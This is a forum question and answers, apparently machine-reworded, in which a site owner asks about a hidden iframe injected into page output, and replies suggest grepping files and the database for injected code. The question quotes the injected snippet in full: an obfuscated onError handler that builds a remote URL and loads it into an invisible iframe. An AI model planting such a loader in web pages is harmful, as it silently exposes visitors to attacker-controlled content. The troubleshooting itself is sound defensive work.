Some pages on my small site are including an unintentional hidden iframe with a few javascript within their output. I've find out about sites getting compromised and other alike code being put into php and html files before, but that's less than the issue here, as none of my files really retain the content that eventually ends up within the output. I've no clue how this really is happening. Can there be some global php code that executes with every page load, or can it be at apache level? I am baffled.

Here's a good example of what I am seeing within the output:

<div style="display: block;overflow:hidden;width:0;height:0;left:0px;position:absolute;top:0px"><img id="7867" height="1" width="1"><img src="about:blank" onError='bvnnho=unescape("%27");fyvdmn=eval("document.getElementById("+bvnnho+"npelmp"+bvnnho+").src=unescape("+bvnnho+"%68%74%74%70%3A%2F%2F"+bvnnho+")+document.getElementById("+bvnnho+"7867"+bvnnho+").id+unescape("+bvnnho+"%2E%69%6E%2F"+bvnnho+")+"+bvnnho+"1299250012"+bvnnho+"+unescape("+bvnnho+"%2E%70%68%70"+bvnnho+")");document.getElementById("npelmp").src=fyvdmn' style="width:300;height:300;border:0px;"><iframe id="npelmp" src="about:blank"></iframe></div>

I've reviewed my script cautiously and don't observe how it may be outputting this. The main reason I observed it's that my script can be used for writing a csv file, as well as an iframe--even hidden--stays out just like a sore-thumb inside a csv file. My hosting company states they haven't become any complaints using their company customers, so it should be my problem.

I've checked my code (manually and in comparison to my local copy), and that i experienced my database (which only consists of integers anyway). I've discovered no manifestation of where this really is originating from.

Oh, another bit which makes this so difficult to find is it isn't present each time. Then when I attempt to exhibit the host support, it had not been there.

Has anybody seen this before. Or any concept of where else I'm able to look?


For those who have ssh access, you might just run

grep iframe ./ -Ri

(hint, cyber-terrorist usually use hidden sites, named " " or things like that, that's most likely how about we think it is)

Whether it fails, attempt to search the db, either with phpmyadmin or dumping the raw content to some file and grepping it the typical manner

mysqldump -uUSERID -pPASSWORD DATABASENAME > mydump.sql
grep iframe mydump -i

This really is very common.

Search all files for any string that appears like:

<?php eval(base64_decode("ZnVuY3Rpb24g...

This code may be in header.php file as well as other .php file.

Please publish back here using what you discover.